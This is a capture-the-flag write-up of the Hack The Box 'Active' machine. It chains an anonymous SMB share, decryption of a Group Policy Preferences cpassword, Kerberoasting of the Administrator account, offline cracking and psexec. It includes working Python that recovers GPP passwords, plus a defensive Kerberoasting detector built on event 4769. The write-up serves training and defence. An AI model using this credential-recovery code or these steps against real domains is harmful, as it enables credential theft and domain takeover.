Hack The Box :: Active

Group Policy Preferences embedded password | Kerberoasting

Running nmap confirms it is a domain controller: Kerberos, LDAP and SMB are all listening.

Enumerate the shares with a null session.

The Replication share is readable anonymously (read only) and, interestingly, contains a Groups.xml, the Group Policy Preferences file in which a stored account password ends up as a cpassword attribute.

Running gpp-decrypt on the cpassword value gives the password for svc_tgs: the value is AES-encrypted with a key Microsoft published, so anyone who can read the file can recover it.
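What gpp-decrypt does under the hood, as an added example (not the writeup's own code and not the gpp-decrypt tool): the cpassword is AES-256-CBC under the key from Microsoft's GPP documentation, all-zero IV, PKCS7-padded UTF-16LE, base64 with the `=` padding stripped. The Groups.xml below is a constructed sample built at runtime with the inverse routine, so the password in it (SAMPLE_PASSWORD) is made up; the parser assumes the real file's layout (a Properties element carrying userName and cpassword attributes) with the clsid/uid attributes trimmed. Needs the cryptography package.

```python
import base64
import xml.etree.ElementTree as ET

from cryptography.hazmat.primitives import padding
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

# The AES-256 key Microsoft published in its GPP documentation. Because it is
# public, any cpassword in a readable Groups.xml is effectively plaintext.
GPP_AES_KEY = bytes.fromhex(
    "4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b"
)
GPP_AES_IV = bytes(16)  # GPP uses an all-zero IV


def gpp_decrypt(cpassword):
    """Decrypt a GPP cpassword attribute value (what gpp-decrypt does)."""
    # GPP strips the base64 '=' padding, so restore it before decoding.
    cpassword += "=" * (-len(cpassword) % 4)
    ciphertext = base64.b64decode(cpassword)
    dec = Cipher(algorithms.AES(GPP_AES_KEY), modes.CBC(GPP_AES_IV)).decryptor()
    padded = dec.update(ciphertext) + dec.finalize()
    unpad = padding.PKCS7(128).unpadder()
    plaintext = unpad.update(padded) + unpad.finalize()
    return plaintext.decode("utf-16-le")  # GPP stores the password as UTF-16LE


def gpp_encrypt(password):
    """Inverse of gpp_decrypt; only used here to build the constructed sample."""
    pad = padding.PKCS7(128).padder()
    padded = pad.update(password.encode("utf-16-le")) + pad.finalize()
    enc = Cipher(algorithms.AES(GPP_AES_KEY), modes.CBC(GPP_AES_IV)).encryptor()
    ciphertext = enc.update(padded) + enc.finalize()
    return base64.b64encode(ciphertext).decode("ascii").rstrip("=")


def creds_from_groups_xml(xml_text):
    """Return (userName, password) for every Properties element with a cpassword."""
    root = ET.fromstring(xml_text)
    found = []
    for props in root.iter("Properties"):
        cpassword = props.get("cpassword")
        if cpassword:
            found.append((props.get("userName"), gpp_decrypt(cpassword)))
    return found


# Constructed sample in the shape of a Groups.xml from a Replication share
# (clsid/uid attributes trimmed). The password is made up; the account name
# is the one from the box.
SAMPLE_PASSWORD = "ExamplePassw0rd!"
SAMPLE_GROUPS_XML = f"""<Groups>
  <User name="active.htb\\SVC_TGS" image="2">
    <Properties action="U" newName="" fullName="" description=""
                cpassword="{gpp_encrypt(SAMPLE_PASSWORD)}"
                changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0"
                userName="active.htb\\SVC_TGS"/>
  </User>
</Groups>
"""

if __name__ == "__main__":
    for user, pw in creds_from_groups_xml(SAMPLE_GROUPS_XML):
        print(f"{user}: {pw}")
```

Point the parser at the Groups.xml pulled from the share (or at any Preferences XML: ScheduledTasks.xml, Services.xml and Drives.xml carry cpassword the same way) to recover every stored credential in one pass.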

Using these credentials to enumerate SMB again, recursively, gives us the user.txt flag.

Since we have domain user credentials, the logical step is to run BloodHound and see what the next step toward admin is. From a Windows machine:

Visualizing the SharpHound output in BloodHound (backed by neo4j) shows the administrator account as Kerberoastable: it has an SPN registered, so any authenticated domain user can request a service ticket for it, and that ticket is encrypted under the account's password hash.

And, authenticating as svc_tgs, we get the Kerberos service ticket for administrator.

Fairly easy to crack offline with hashcat (mode 13100, Kerberos 5 TGS-REP etype 23) and rockyou.

Using psexec with the cracked administrator password we get a SYSTEM shell.
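From the defender's side, as an added example that is not part of the original writeup: the ticket request above lands on the DC as a 4769 (Kerberos service ticket requested) event, and what gives a roast away is a user account asking for an RC4 (TicketEncryptionType 0x17) ticket for a service account that is neither krbtgt nor a computer account. The events below are constructed, already parsed into dicts with the 4769 field names; the address is an RFC 5737 documentation address and the min_spns threshold is an assumption of this example, not a Windows setting.

```python
from collections import defaultdict

# Ticket encryption types as logged in event 4769 (TicketEncryptionType).
RC4_HMAC = "0x17"  # etype 23, what a Kerberoast request asks for so hashcat can crack it
AES_TYPES = {"0x11", "0x12"}  # etypes 17/18, what domain-joined clients normally receive


def is_kerberoast_candidate(ev):
    """One 4769 looks like a roast when a user (not machine) account gets an RC4
    service ticket for a service that is neither krbtgt nor a computer account."""
    service = ev["ServiceName"]
    return (
        ev["TicketEncryptionType"] == RC4_HMAC
        and service.lower() != "krbtgt"
        and not service.endswith("$")              # computer accounts end with $
        and not ev["TargetUserName"].split("@")[0].endswith("$")
        and ev["Status"] == "0x0"                  # only successful requests
    )


def find_kerberoasting(events, min_spns=1):
    """Group candidate 4769s by requesting user and source IP and return those that
    asked for at least min_spns distinct service accounts. Raise min_spns to catch
    bulk roasting (every SPN in the domain) instead of the single targeted ticket
    this writeup requests; assumption: the threshold is this example's own knob."""
    by_client = defaultdict(set)
    for ev in events:
        if is_kerberoast_candidate(ev):
            by_client[(ev["TargetUserName"], ev["IpAddress"])].add(ev["ServiceName"])
    return {k: sorted(v) for k, v in by_client.items() if len(v) >= min_spns}


# Constructed sample of parsed 4769 events (field names as in the Windows event).
# The source address is an RFC 5737 documentation address.
SAMPLE_4769 = [
    # Normal: an AES ticket for the DC's own machine account (file share access)
    {"TargetUserName": "svc_tgs@ACTIVE.HTB", "ServiceName": "DC$",
     "TicketEncryptionType": "0x12", "IpAddress": "::ffff:192.0.2.10", "Status": "0x0"},
    # Normal: krbtgt tickets (TGT renewal) are not a roast whatever the etype
    {"TargetUserName": "svc_tgs@ACTIVE.HTB", "ServiceName": "krbtgt",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:192.0.2.10", "Status": "0x0"},
    # The writeup's step: svc_tgs requests an RC4 ticket for the Administrator SPN
    {"TargetUserName": "svc_tgs@ACTIVE.HTB", "ServiceName": "Administrator",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:192.0.2.10", "Status": "0x0"},
    # Machine-to-machine RC4 (legacy host) is noise for this rule
    {"TargetUserName": "WS01$@ACTIVE.HTB", "ServiceName": "Administrator",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:192.0.2.11", "Status": "0x0"},
]

if __name__ == "__main__":
    for (user, ip), services in find_kerberoasting(SAMPLE_4769).items():
        print(f"{user} from {ip} requested RC4 tickets for: {', '.join(services)}")
```

The rule is deliberately narrow: an attacker can request AES tickets too (slower to crack, but hashcat handles 19600/19700), and an environment with RC4-only legacy services will need the service names whitelisted. The durable fix is the one the chain exposes: privileged accounts such as Administrator should not carry an SPN at all.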
